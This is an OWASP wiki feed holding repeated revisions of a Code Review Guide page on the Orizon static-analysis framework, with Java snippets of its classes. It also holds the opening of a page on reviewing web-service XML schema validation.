 '''      boolean ret = false;&lt;br /&gt;
 '''      switch (language) {&lt;br /&gt;
 '''         case Cons.O_JAVA:&lt;br /&gt;
 '''             t = new JavaTranslator();&lt;br /&gt;
 '''             if (!t.scan(getInFileName())) &lt;br /&gt;
 '''                return log.error(&amp;quot;can't scan &amp;quot; + getInFileName() + &amp;quot;.&amp;quot;);&lt;br /&gt;
 '''                ret = true;&lt;br /&gt;
 '''         break;&lt;br /&gt;
 '''         default:&lt;br /&gt;
 '''             log.error(&amp;quot;can't inspect language: &amp;quot; + Cons.name(language));&lt;br /&gt;
 '''         break;&lt;br /&gt;
 '''      }&lt;br /&gt;
 '''      return ret;&lt;br /&gt;
 '''   }&lt;br /&gt;
&lt;br /&gt;
Scan method is an abstract method defined in org.owasp.orizon.translator.DefaultTranslator class and declared as the following: &lt;br /&gt;
&lt;br /&gt;
 ''' public abstract boolean scan(String in);&lt;br /&gt;
&lt;br /&gt;
Every class implementing DefaultTranslator must implement how to scan the source file and build ASTs in this method. &lt;br /&gt;
&lt;br /&gt;
Aside from scan() method, there are four abstract method needful to create XML input files. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 ''' public abstract boolean statService(String in, String out);&lt;br /&gt;
 ''' public abstract boolean callGraphService(String in, String out);&lt;br /&gt;
 ''' public abstract boolean dataFlowService(String in, String out);&lt;br /&gt;
 ''' public abstract boolean controlFlowService(String in, String out);&lt;br /&gt;
&lt;br /&gt;
All these methods are called in the translator() method, the one implemented directly from DefaultTranslator class. &lt;br /&gt;
&lt;br /&gt;
 ''' public final boolean translate(String in, String out, int service) {&lt;br /&gt;
 '''    if (!isGoodService(service))&lt;br /&gt;
 '''       return false;&lt;br /&gt;
 '''    if (!scanned)&lt;br /&gt;
 '''       if (!scan(in))&lt;br /&gt;
 '''          return log.error(in+ &amp;quot;: scan has been failed&amp;quot;);&lt;br /&gt;
 '''    switch (service) {&lt;br /&gt;
 '''      case Cons.OC_TRANSLATOR_STAT:&lt;br /&gt;
 '''          return statService(in, out);&lt;br /&gt;
 '''      case Cons.OC_TRANSLATOR_CF:&lt;br /&gt;
 '''          return controlFlowService(in, out);&lt;br /&gt;
 '''      case Cons.OC_TRANSLATOR_CG:&lt;br /&gt;
 '''          return callGraphService(in, out);&lt;br /&gt;
 '''      case Cons.OC_TRANSLATOR_DF:&lt;br /&gt;
 '''          return dataFlowService(in, out);&lt;br /&gt;
 '''      default:&lt;br /&gt;
 '''          return log.error(&amp;quot;unknown service code&amp;quot;);&lt;br /&gt;
 '''    }&lt;br /&gt;
 ''' }&lt;br /&gt;
&lt;br /&gt;
So, when a language specific translator is prompted for translate() method, this recalls the language specific service methods. &lt;br /&gt;
&lt;br /&gt;
Every translator contains as private field, a language specific scanner containing ASTs to be used in input file generation. &lt;br /&gt;
&lt;br /&gt;
Consider org.owasp.orizon.translator.java.JavaTranslator class, it is declared as follows: &lt;br /&gt;
&lt;br /&gt;
 ''' public class JavaTranslator extends DefaultTranslator {&lt;br /&gt;
 '''   static SourcePositions positions;&lt;br /&gt;
 '''   private JavaScanner j;&lt;br /&gt;
 '''   ...&lt;br /&gt;
&lt;br /&gt;
JavaScanner is a class from org.owasp.orizon.translator.java package and it uses Sun JDK 6 Compiler API to scan a Java file creating in memory ASTs. Trees are created in scan() method, implemented for Java source language as follow: &lt;br /&gt;
&lt;br /&gt;
 ''' public final boolean scan(String in) {&lt;br /&gt;
 '''    boolean ret = false;&lt;br /&gt;
 '''    String[] parms = { in };&lt;br /&gt;
 '''    Trees trees;&lt;br /&gt;
 ''' 		&lt;br /&gt;
 '''    JavaCompiler compiler = ToolProvider.getSystemJavaCompiler();&lt;br /&gt;
 '''    if (compiler == null) &lt;br /&gt;
 '''       return log.error(&amp;quot;I can't find a suitable JAVA compiler. Is a JDK installed?&amp;quot;);&lt;br /&gt;
 ''' 	&lt;br /&gt;
 '''    DiagnosticCollector&amp;lt;JavaFileObject&amp;gt; diagnostics = new DiagnosticCollector&amp;lt;JavaFileObject&amp;gt;();&lt;br /&gt;
 '''    StandardJavaFileManager fileManager = compiler.getStandardFileManager(diagnostics, null, null);&lt;br /&gt;
 '''    Iterable&amp;lt;? extends JavaFileObject&amp;gt; fileObjects = fileManager.getJavaFileObjects(parms);&lt;br /&gt;
 '''&lt;br /&gt;
 '''    JavacTask task = (com.sun.source.util.JavacTask) compiler.getTask(null,fileManager, diagnostics, null, null, fileObjects);&lt;br /&gt;
 '''&lt;br /&gt;
 '''    try {&lt;br /&gt;
 '''        trees = Trees.instance(task);&lt;br /&gt;
 '''        positions = trees.getSourcePositions();&lt;br /&gt;
 '''        Iterable&amp;lt;? extends CompilationUnitTree&amp;gt; asts = task.parse();&lt;br /&gt;
 '''        for (CompilationUnitTree ast : asts) {&lt;br /&gt;
 '''            j = new JavaScanner(positions, ast);&lt;br /&gt;
 '''            j.scan(ast, null);&lt;br /&gt;
 '''        }&lt;br /&gt;
 '''        scanned = true;&lt;br /&gt;
 '''        return true;&lt;br /&gt;
 '''    } catch (IOException e) {&lt;br /&gt;
 '''        return log.fatal(&amp;quot;an exception occured while translate &amp;quot; + in + &amp;quot;: &amp;quot; +e.getLocalizedMessage());&lt;br /&gt;
 '''    }&lt;br /&gt;
 ''' }&lt;br /&gt;
&lt;br /&gt;
===Statistical Gathering ===&lt;br /&gt;
To implement statistic information gathering, DefaultTranslator abstract method statService() must be implemented. In the following example, the method is the JavaTranslator's. Statistics information is stored in the JavaScanner object itself and retrieved by getStats() method. &lt;br /&gt;
&lt;br /&gt;
 ''' public final boolean statService(String in, String out) {&lt;br /&gt;
 '''    boolean ret = false;&lt;br /&gt;
 ''' 		&lt;br /&gt;
 '''    if (!scanned)&lt;br /&gt;
 '''       return log.error(in + &amp;quot;: call scan() before asking translation...&amp;quot;);&lt;br /&gt;
 '''    log.debug(&amp;quot;. Entering statService(): collecting stats for: &amp;quot; + in);&lt;br /&gt;
 '''    try {&lt;br /&gt;
 '''        createXmlFile(out);&lt;br /&gt;
 '''        xmlInit();&lt;br /&gt;
 '''        xml(&amp;quot;&amp;lt;source name=\&amp;quot;&amp;quot; + in+&amp;quot;\&amp;quot; &amp;gt;&amp;quot;);&lt;br /&gt;
 '''        xml(j.getStats());&lt;br /&gt;
 '''        xml(&amp;quot;&amp;lt;/source&amp;gt;&amp;quot;);&lt;br /&gt;
 '''        xmlEnd();&lt;br /&gt;
 '''&lt;br /&gt;
 '''    } catch (FileNotFoundException e) {&lt;br /&gt;
 '''    } catch (UnsupportedEncodingException e) {&lt;br /&gt;
 '''    } catch (IOException e) {&lt;br /&gt;
 '''        ret = log.error(&amp;quot;an exception occured: &amp;quot; + e.getMessage());&lt;br /&gt;
 '''    }&lt;br /&gt;
 '''    ret = true;&lt;br /&gt;
 '''    log.debug(&amp;quot;stats written into: &amp;quot; + out);&lt;br /&gt;
 '''    log.debug(&amp;quot;. Leaving statService()&amp;quot;);&lt;br /&gt;
 '''    return ret;&lt;br /&gt;
 ''' }&lt;br /&gt;
&lt;br /&gt;
== Reference == &lt;br /&gt;
&lt;br /&gt;
To anyone interested in Owasp Orizon framework, you can use the following links:&lt;br /&gt;
* main page @ Owasp: [[::Category:OWASP_Orizon_Project]]&lt;br /&gt;
* main site @ SourceForge: [http://orizon.sourceforge.net http://orizon.sourceforge.net]&lt;br /&gt;
* blog: [http://orizon.sourceforget.net/blog http://orizon.sourceforge.net/blog]&lt;br /&gt;
* author page @ Owasp: [http://www.owasp.org/index.php/User:Thesp0nge http://www.owasp.org/index.php/User:Thesp0nge]&lt;br /&gt;
&lt;br /&gt;
You can drop also a line to Orizon author: [mailto:thesp0nge@owasp.org thesp0nge@owasp.org]&lt;br /&gt;
 '''foo'''&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=The_Owasp_Orizon_Framework&amp;diff=61245</id>
		<title>The Owasp Orizon Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=The_Owasp_Orizon_Framework&amp;diff=61245"/>
				<updated>2009-05-22T13:06:59Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Reference */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[OWASP Code Review Guide Table of Contents]]__TOC__&lt;br /&gt;
[[Category:OWASP Code Review Project]]&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
A lot of open source projects exist in the wild, performing static code review analysis. This is good, it means that source code testing for security issues is becoming a constraint. &lt;br /&gt;
&lt;br /&gt;
Such tools bring a lot of valuable points:&lt;br /&gt;
* community support&lt;br /&gt;
* source code freely available to anyone&lt;br /&gt;
* costs&lt;br /&gt;
&lt;br /&gt;
On the other side, these tools don't share the most valuable point among them: the security knowledge. All these tools have their own security library, containing a lot of checks, without sharing such knowledge. &lt;br /&gt;
&lt;br /&gt;
In 2006, the Owasp Orizon project wass born to provide a common underlying layer to all opensource projects concerning static analysis. &lt;br /&gt;
&lt;br /&gt;
Orizon project includes:&lt;br /&gt;
* a set of APIs that developers can use to build their own security tool performing static analysis.&lt;br /&gt;
* a security library with checks to apply to source code.&lt;br /&gt;
* a tool, Milk, which is able to static analyze a source code using Orizon Framework.&lt;br /&gt;
&lt;br /&gt;
== The Owasp Orizon Architecture ==&lt;br /&gt;
In the following picture, the Owasp Orizon version 1.0 architecture is shown. As you may see, the framework is organized in engines that perform tasks over the source code and a block of tools that are deployed out of the box in order to use the APIs in a real world static analysis. &lt;br /&gt;
&lt;br /&gt;
[[Image:Owasp_Orizon_Architecture_v1.0.png|400px|The Owasp Orizon v1.0 architecture]]&lt;br /&gt;
&lt;br /&gt;
With all such elements, a developer can be scared to use the framework; that's why a special entity called SkyLine was created. Before going further into SkyLine analysis, it's very important to understand all the elements Orizon is made of. &lt;br /&gt;
&lt;br /&gt;
=== Your personal butler: the SkyLine class ===&lt;br /&gt;
Named '''core''' in the architectural picture, the SkyLine object is one of the most valuable services in Orizon version 1.0. &lt;br /&gt;
&lt;br /&gt;
The idea behind SkyLine is simple: as the Orizon architecture becomes wider, regular developers may be scared about understanding a lot of APIs in order to build their security tool, so we can help them providing  &amp;quot;per service&amp;quot; support. &lt;br /&gt;
&lt;br /&gt;
Using SkyLine object, developers can request services from the Orizon framework waiting for their accomplishment. &lt;br /&gt;
&lt;br /&gt;
The main SkyLine input is: &lt;br /&gt;
&lt;br /&gt;
 '''public boolean launch(String service)'''&lt;br /&gt;
&lt;br /&gt;
Passing the requested service as string parameter, the calling program will receive a boolean true return value if the service can be accomplished or a false value otherwise. &lt;br /&gt;
&lt;br /&gt;
The service name is compared to the ones understood by the framework: &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 '''private int goodService(String service) {&lt;br /&gt;
 '''  int ret = -1;&lt;br /&gt;
 '''  if (service.equalsIgnoreCase(&amp;quot;init&amp;quot;))&lt;br /&gt;
 '''      ret = Cons.OC_SERVICE_INIT_FRAMEWORK;&lt;br /&gt;
 '''  if (service.equalsIgnoreCase(&amp;quot;translate&amp;quot;))&lt;br /&gt;
 '''      ret = Cons.OC_SERVICE_INIT_TRANSLATE;&lt;br /&gt;
 '''  if (service.equalsIgnoreCase(&amp;quot;static_analysis&amp;quot;))&lt;br /&gt;
 '''      ret = Cons.OC_SERVICE_STATIC_ANALYSIS;&lt;br /&gt;
 '''  if (service.equalsIgnoreCase(&amp;quot;score&amp;quot;))&lt;br /&gt;
 '''      ret = Cons.OC_SERVICE_SCORE;&lt;br /&gt;
 '''  return ret;&lt;br /&gt;
 '''}&lt;br /&gt;
&lt;br /&gt;
The secondary feature introduced in this first major framework release is the support for command line option given to the user. &lt;br /&gt;
&lt;br /&gt;
If the calling program passes command line option to Orizon framework using SkyLine, the framework will be tuned accordingly to the given values. &lt;br /&gt;
&lt;br /&gt;
This example will explain better: &lt;br /&gt;
&lt;br /&gt;
 '''public static void main(String[] args) {&lt;br /&gt;
 '''   String fileName = &amp;quot;&amp;quot;;&lt;br /&gt;
 '''   OldRecipe r;&lt;br /&gt;
 '''   DefaultLibrary dl;&lt;br /&gt;
 '''&lt;br /&gt;
 '''   SkyLine skyLine = new SkyLine(args);&lt;br /&gt;
&lt;br /&gt;
That's all folks! Internally, the SkyLine constructor, when it creates a code review session,  uses the values it was able to understand from command line. &lt;br /&gt;
&lt;br /&gt;
The command line format must follow this convention &lt;br /&gt;
&lt;br /&gt;
 ''' -o orizon_key=value&lt;br /&gt;
or the long format&lt;br /&gt;
 ''' --orizon orizon_key=value&lt;br /&gt;
&lt;br /&gt;
And these are the keys that the framework cares about:&lt;br /&gt;
* &amp;quot;input-name&amp;quot;&lt;br /&gt;
* &amp;quot;input-kind&amp;quot;&lt;br /&gt;
* &amp;quot;working-dir&amp;quot;&lt;br /&gt;
* &amp;quot;lang&amp;quot;&lt;br /&gt;
* &amp;quot;recurse&amp;quot;&lt;br /&gt;
* &amp;quot;output-format&amp;quot;&lt;br /&gt;
* &amp;quot;scan-type&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
The org.owasp.orizon.Cons class contains a detailed section about these keys with some comments and with their default value.	&lt;br /&gt;
&lt;br /&gt;
The only side effect is that calling program can use -o flag for its purpose.&lt;br /&gt;
 &lt;br /&gt;
SkyLine is contained in the org.owasp.orizon package.&lt;br /&gt;
&lt;br /&gt;
=== Give me something to remind: the Session class ===&lt;br /&gt;
Another big feature introduced in Owasp Orizon version 1.0 is the code review session concept. One of the missing features in earlier versions was the capability to track the state of the code review process. &lt;br /&gt;
&lt;br /&gt;
A Session class instance contains all the properties specified using SkyLine and it is their owner giving access to properties upon request. It contains a SessionInfo array containing information about each file being reviewed. &lt;br /&gt;
&lt;br /&gt;
Ideally, a user tool will never call Session directly, but it must use SkyLine as interface. Of course anyone is free to override this suggestion. &lt;br /&gt;
&lt;br /&gt;
Looking at the launch() method code, inside the SkyLine class, you can look how session instance is prompted to execute services. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 '''public boolean launch(String service) {&lt;br /&gt;
 '''   int code, stats;&lt;br /&gt;
 '''   boolean ret = false;&lt;br /&gt;
 '''&lt;br /&gt;
 '''   if ( (code = goodService(service)) == -1)&lt;br /&gt;
 '''      return log.error(&amp;quot;unknown service: &amp;quot; + service);&lt;br /&gt;
 '''   switch (code) {&lt;br /&gt;
 '''       // init service&lt;br /&gt;
 '''       case Cons.OC_SERVICE_INIT_FRAMEWORK:&lt;br /&gt;
 '''            ret = session.init();&lt;br /&gt;
 '''            break;&lt;br /&gt;
 '''       // translation service&lt;br /&gt;
 '''       case Cons.OC_SERVICE_INIT_TRANSLATE:&lt;br /&gt;
 '''            stats = session.collectStats();&lt;br /&gt;
 '''            if (stats &amp;gt; 0) {&lt;br /&gt;
 '''               log.warning(stats + &amp;quot; files failed in collecting statistics.&amp;quot;);&lt;br /&gt;
 '''               ret = false;&lt;br /&gt;
 '''            } else&lt;br /&gt;
 '''               ret = true;&lt;br /&gt;
 '''            break;&lt;br /&gt;
 '''       // static analysis service&lt;br /&gt;
 '''       case Cons.OC_SERVICE_STATIC_ANALYSIS:&lt;br /&gt;
 '''            ret = session.staticReview();&lt;br /&gt;
 '''            break;&lt;br /&gt;
 '''       // score service&lt;br /&gt;
 '''       case Cons.OC_SERVICE_SCORE:&lt;br /&gt;
 '''            break;&lt;br /&gt;
 '''       default:&lt;br /&gt;
 '''            return log.error(&amp;quot;unknown service: &amp;quot; + service);&lt;br /&gt;
 '''       }&lt;br /&gt;
 '''       return ret;&lt;br /&gt;
 '''}&lt;br /&gt;
&lt;br /&gt;
Internally, the Session instance will ask each SessionInfo object to execute services. Let us consider the Session class method that executes the static analysis service. &lt;br /&gt;
&lt;br /&gt;
 '''/**&lt;br /&gt;
 '''  * Starts a static analysis over the files being reviewed&lt;br /&gt;
 '''  * &lt;br /&gt;
 '''  * @return &amp;lt;i&amp;gt;true&amp;lt;/i&amp;gt; if static analysis can be performed or &amp;lt;i&amp;gt;false&amp;lt;/i&amp;gt;&lt;br /&gt;
 '''  *         if one or more files fail being analyzed.&lt;br /&gt;
 '''  */&lt;br /&gt;
 '''public boolean staticReview() {&lt;br /&gt;
 '''   boolean ret = true;&lt;br /&gt;
 '''   if (!active)&lt;br /&gt;
 '''      return log.error(&amp;quot;can't perform a static analysis over an inactive session.&amp;quot;);&lt;br /&gt;
 '''   for (int i = 0; i &amp;lt; sessions.length; i++) {&lt;br /&gt;
 '''       if (! sessions[i].staticReview())&lt;br /&gt;
 '''          ret = false;&lt;br /&gt;
 '''   }&lt;br /&gt;
 '''   return ret;&lt;br /&gt;
 '''}&lt;br /&gt;
&lt;br /&gt;
Where sessions variable is declared as:&lt;br /&gt;
 '''private SessionInfo[] sessions;&lt;br /&gt;
&lt;br /&gt;
As you may see, the Session object delegates service accomplishment to SessionInfo once collecting the final results. &lt;br /&gt;
&lt;br /&gt;
In fact, SessionInfo objects are the ones talking with Orizon internals performing the real work. &lt;br /&gt;
&lt;br /&gt;
The following method is stolen from org.owasp.orizon.SessionInfo class. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 '''/**&lt;br /&gt;
 '''  * Perform a static analysis over the given file&lt;br /&gt;
 '''  * &lt;br /&gt;
 '''  * A full static analysis is a mix from:&lt;br /&gt;
 '''  * &lt;br /&gt;
 '''  *  * local analysis (control flow)&lt;br /&gt;
 '''  *  * global analysis (call graph)&lt;br /&gt;
 '''  *  * taint propagation&lt;br /&gt;
 '''  *  * statistics&lt;br /&gt;
 '''  * &lt;br /&gt;
 '''  * &lt;br /&gt;
 '''  * @return &amp;lt;i&amp;gt;true&amp;lt;/i&amp;gt; if the file being reviewed doesn't violate any&lt;br /&gt;
 '''  *         security check, &amp;lt;i&amp;gt;false&amp;lt;/i&amp;gt; otherwise.&lt;br /&gt;
 '''  */&lt;br /&gt;
 '''  public boolean staticReview() {&lt;br /&gt;
 '''     boolean ret = false;&lt;br /&gt;
 '''     s = new Source(getStatFileName());&lt;br /&gt;
 '''     ret = s.analyzeStats();&lt;br /&gt;
 '''     ...&lt;br /&gt;
 '''     return ret;&lt;br /&gt;
 '''  }&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== The Translation Factory ===&lt;br /&gt;
One of the Owasp Orizon goals is to be independent from the source language being analyzed. This means that Owasp Orizon will support: &lt;br /&gt;
* Java&lt;br /&gt;
* C, C++&lt;br /&gt;
* C#&lt;br /&gt;
* Perl&lt;br /&gt;
* ...&lt;br /&gt;
Such support is granted using an intermediate file format to describe the source code and used to apply the security checks. Such format is XML language. &lt;br /&gt;
&lt;br /&gt;
A source code, before static analysis is started, is translated into XML. Starting from version 1.0, each source code is translated in 4 XML files: &lt;br /&gt;
&lt;br /&gt;
* an XML file containing statistical information&lt;br /&gt;
* an XML file containing variables tracking information&lt;br /&gt;
* an XML file containing program control flow (local analysis)&lt;br /&gt;
* an XML file containing call graph (global analysis)&lt;br /&gt;
&lt;br /&gt;
At the time this document is written (Owasp Orizon v1.0pre1, September 2008), only the Java programming language is supported, however other programming language will follow soon. &lt;br /&gt;
&lt;br /&gt;
Translation phase is requested from org.owasp.orizon.SessionInfo.inspect() method. Depending on the source file language, the appropriate Translator is called and the scan() method is called. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 ''' /**&lt;br /&gt;
 '''   * Inspects the source code, building AST trees&lt;br /&gt;
 '''   * @return&lt;br /&gt;
 '''   */&lt;br /&gt;
 '''   public boolean inspect() {&lt;br /&gt;
 '''      boolean ret = false;&lt;br /&gt;
 '''      switch (language) {&lt;br /&gt;
 '''         case Cons.O_JAVA:&lt;br /&gt;
 '''             t = new JavaTranslator();&lt;br /&gt;
 '''             if (!t.scan(getInFileName())) &lt;br /&gt;
 '''                return log.error(&amp;quot;can't scan &amp;quot; + getInFileName() + &amp;quot;.&amp;quot;);&lt;br /&gt;
 '''                ret = true;&lt;br /&gt;
 '''         break;&lt;br /&gt;
 '''         default:&lt;br /&gt;
 '''             log.error(&amp;quot;can't inspect language: &amp;quot; + Cons.name(language));&lt;br /&gt;
 '''         break;&lt;br /&gt;
 '''      }&lt;br /&gt;
 '''      return ret;&lt;br /&gt;
 '''   }&lt;br /&gt;
&lt;br /&gt;
Scan method is an abstract method defined in org.owasp.orizon.translator.DefaultTranslator class and declared as the following: &lt;br /&gt;
&lt;br /&gt;
 ''' public abstract boolean scan(String in);&lt;br /&gt;
&lt;br /&gt;
Every class implementing DefaultTranslator must implement how to scan the source file and build ASTs in this method. &lt;br /&gt;
&lt;br /&gt;
Aside from scan() method, there are four abstract method needful to create XML input files. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 ''' public abstract boolean statService(String in, String out);&lt;br /&gt;
 ''' public abstract boolean callGraphService(String in, String out);&lt;br /&gt;
 ''' public abstract boolean dataFlowService(String in, String out);&lt;br /&gt;
 ''' public abstract boolean controlFlowService(String in, String out);&lt;br /&gt;
&lt;br /&gt;
All these methods are called in the translator() method, the one implemented directly from DefaultTranslator class. &lt;br /&gt;
&lt;br /&gt;
 ''' public final boolean translate(String in, String out, int service) {&lt;br /&gt;
 '''    if (!isGoodService(service))&lt;br /&gt;
 '''       return false;&lt;br /&gt;
 '''    if (!scanned)&lt;br /&gt;
 '''       if (!scan(in))&lt;br /&gt;
 '''          return log.error(in+ &amp;quot;: scan has been failed&amp;quot;);&lt;br /&gt;
 '''    switch (service) {&lt;br /&gt;
 '''      case Cons.OC_TRANSLATOR_STAT:&lt;br /&gt;
 '''          return statService(in, out);&lt;br /&gt;
 '''      case Cons.OC_TRANSLATOR_CF:&lt;br /&gt;
 '''          return controlFlowService(in, out);&lt;br /&gt;
 '''      case Cons.OC_TRANSLATOR_CG:&lt;br /&gt;
 '''          return callGraphService(in, out);&lt;br /&gt;
 '''      case Cons.OC_TRANSLATOR_DF:&lt;br /&gt;
 '''          return dataFlowService(in, out);&lt;br /&gt;
 '''      default:&lt;br /&gt;
 '''          return log.error(&amp;quot;unknown service code&amp;quot;);&lt;br /&gt;
 '''    }&lt;br /&gt;
 ''' }&lt;br /&gt;
&lt;br /&gt;
So, when a language specific translator is prompted for translate() method, this recalls the language specific service methods. &lt;br /&gt;
&lt;br /&gt;
Every translator contains as private field, a language specific scanner containing ASTs to be used in input file generation. &lt;br /&gt;
&lt;br /&gt;
Consider org.owasp.orizon.translator.java.JavaTranslator class, it is declared as follows: &lt;br /&gt;
&lt;br /&gt;
 ''' public class JavaTranslator extends DefaultTranslator {&lt;br /&gt;
 '''   static SourcePositions positions;&lt;br /&gt;
 '''   private JavaScanner j;&lt;br /&gt;
 '''   ...&lt;br /&gt;
&lt;br /&gt;
JavaScanner is a class from org.owasp.orizon.translator.java package and it uses Sun JDK 6 Compiler API to scan a Java file creating in memory ASTs. Trees are created in scan() method, implemented for Java source language as follow: &lt;br /&gt;
&lt;br /&gt;
 ''' public final boolean scan(String in) {&lt;br /&gt;
 '''    boolean ret = false;&lt;br /&gt;
 '''    String[] parms = { in };&lt;br /&gt;
 '''    Trees trees;&lt;br /&gt;
 ''' 		&lt;br /&gt;
 '''    JavaCompiler compiler = ToolProvider.getSystemJavaCompiler();&lt;br /&gt;
 '''    if (compiler == null) &lt;br /&gt;
 '''       return log.error(&amp;quot;I can't find a suitable JAVA compiler. Is a JDK installed?&amp;quot;);&lt;br /&gt;
 ''' 	&lt;br /&gt;
 '''    DiagnosticCollector&amp;lt;JavaFileObject&amp;gt; diagnostics = new DiagnosticCollector&amp;lt;JavaFileObject&amp;gt;();&lt;br /&gt;
 '''    StandardJavaFileManager fileManager = compiler.getStandardFileManager(diagnostics, null, null);&lt;br /&gt;
 '''    Iterable&amp;lt;? extends JavaFileObject&amp;gt; fileObjects = fileManager.getJavaFileObjects(parms);&lt;br /&gt;
 '''&lt;br /&gt;
 '''    JavacTask task = (com.sun.source.util.JavacTask) compiler.getTask(null,fileManager, diagnostics, null, null, fileObjects);&lt;br /&gt;
 '''&lt;br /&gt;
 '''    try {&lt;br /&gt;
 '''        trees = Trees.instance(task);&lt;br /&gt;
 '''        positions = trees.getSourcePositions();&lt;br /&gt;
 '''        Iterable&amp;lt;? extends CompilationUnitTree&amp;gt; asts = task.parse();&lt;br /&gt;
 '''        for (CompilationUnitTree ast : asts) {&lt;br /&gt;
 '''            j = new JavaScanner(positions, ast);&lt;br /&gt;
 '''            j.scan(ast, null);&lt;br /&gt;
 '''        }&lt;br /&gt;
 '''        scanned = true;&lt;br /&gt;
 '''        return true;&lt;br /&gt;
 '''    } catch (IOException e) {&lt;br /&gt;
 '''        return log.fatal(&amp;quot;an exception occured while translate &amp;quot; + in + &amp;quot;: &amp;quot; +e.getLocalizedMessage());&lt;br /&gt;
 '''    }&lt;br /&gt;
 ''' }&lt;br /&gt;
&lt;br /&gt;
===Statistical Gathering ===&lt;br /&gt;
To implement statistic information gathering, DefaultTranslator abstract method statService() must be implemented. In the following example, the method is the JavaTranslator's. Statistics information is stored in the JavaScanner object itself and retrieved by getStats() method. &lt;br /&gt;
&lt;br /&gt;
 ''' public final boolean statService(String in, String out) {&lt;br /&gt;
 '''    boolean ret = false;&lt;br /&gt;
 ''' 		&lt;br /&gt;
 '''    if (!scanned)&lt;br /&gt;
 '''       return log.error(in + &amp;quot;: call scan() before asking translation...&amp;quot;);&lt;br /&gt;
 '''    log.debug(&amp;quot;. Entering statService(): collecting stats for: &amp;quot; + in);&lt;br /&gt;
 '''    try {&lt;br /&gt;
 '''        createXmlFile(out);&lt;br /&gt;
 '''        xmlInit();&lt;br /&gt;
 '''        xml(&amp;quot;&amp;lt;source name=\&amp;quot;&amp;quot; + in+&amp;quot;\&amp;quot; &amp;gt;&amp;quot;);&lt;br /&gt;
 '''        xml(j.getStats());&lt;br /&gt;
 '''        xml(&amp;quot;&amp;lt;/source&amp;gt;&amp;quot;);&lt;br /&gt;
 '''        xmlEnd();&lt;br /&gt;
 '''&lt;br /&gt;
 '''    } catch (FileNotFoundException e) {&lt;br /&gt;
 '''    } catch (UnsupportedEncodingException e) {&lt;br /&gt;
 '''    } catch (IOException e) {&lt;br /&gt;
 '''        ret = log.error(&amp;quot;an exception occured: &amp;quot; + e.getMessage());&lt;br /&gt;
 '''    }&lt;br /&gt;
 '''    ret = true;&lt;br /&gt;
 '''    log.debug(&amp;quot;stats written into: &amp;quot; + out);&lt;br /&gt;
 '''    log.debug(&amp;quot;. Leaving statService()&amp;quot;);&lt;br /&gt;
 '''    return ret;&lt;br /&gt;
 ''' }&lt;br /&gt;
&lt;br /&gt;
== Reference == &lt;br /&gt;
&lt;br /&gt;
To anyone interested in Owasp Orizon framework, you can use the following links:&lt;br /&gt;
* main page @ Owasp: [{::Category:OWASP_Orizon_Project]]&lt;br /&gt;
* main site @ SourceForge: [http://orizon.sourceforge.net http://orizon.sourceforge.net]&lt;br /&gt;
* blog: [http://orizon.sourceforget.net/blog http://orizon.sourceforge.net/blog]&lt;br /&gt;
* author page @ Owasp: [http://www.owasp.org/index.php/User:Thesp0nge http://www.owasp.org/index.php/User:Thesp0nge]&lt;br /&gt;
&lt;br /&gt;
You can drop also a line to Orizon author: [mailto:thesp0nge@owasp.org thesp0nge@owasp.org]&lt;br /&gt;
 '''foo'''&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Reviewing_Web_Services&amp;diff=61243</id>
		<title>Reviewing Web Services</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Reviewing_Web_Services&amp;diff=61243"/>
				<updated>2009-05-22T12:58:54Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Reviewing Webservices and XML Payloads */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[OWASP Code Review Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Reviewing Webservices and XML Payloads==&lt;br /&gt;
When reviewing webservices, one should focus firstly on the generic security controls related to any application. Webservices also have some unique controls should be looked at. &lt;br /&gt;
&lt;br /&gt;
===XML Schema : Input validation===&lt;br /&gt;
Schemas are used to ensure that the XML payload received is within defined and expected limits. They can be specific to a list of known good values or simply define length and type. Some XML applications do not have a schema implemented, which may mean input validation is performed downstream or even not at all!! &lt;br /&gt;
&lt;br /&gt;
''Keywords''&lt;br /&gt;
 '''Namespace''': : An XML namespace is a collection of XML elements and attributes identified by an Internationalised Resource Identifier (RI). &lt;br /&gt;
&lt;br /&gt;
In a single document, elements may exist with the same name that were created by different entities.&lt;br /&gt;
&lt;br /&gt;
To distinguish between such different definitions with the same name, an XML Schema allows the concept of namespaces -  think Java packages :)&lt;br /&gt;
&lt;br /&gt;
The schema can specify a finite amount of parameters, the expected parameters in the XML payload alongside the expected types and values of the payload data.&lt;br /&gt;
&lt;br /&gt;
The ProcessContents attribute indicates how XML from other namespaces should be validated. When the processContents attribute is set to  '''lax''' or '''skip''', input validation is not performed for wildcard attributes and parameters.&lt;br /&gt;
&lt;br /&gt;
The value for this attribute may be &lt;br /&gt;
* '''strict''': There must be a declaration associated with the namespace and validate the XML. &lt;br /&gt;
* '''lax''' There should be an attempt to validate the XML against its schema. &lt;br /&gt;
* '''skip''' There is no attempt to validate the XML.&lt;br /&gt;
&lt;br /&gt;
 processContents=strict\lax\skip&lt;br /&gt;
&lt;br /&gt;
===Infinite Occurrences of an Element or Attribute===&lt;br /&gt;
The unbounded value can be used on an XML schema to specify the there is no maximum occurrence expected for a specific element. &lt;br /&gt;
&lt;br /&gt;
 maxOccurs= positive-Integer|unbounded&lt;br /&gt;
&lt;br /&gt;
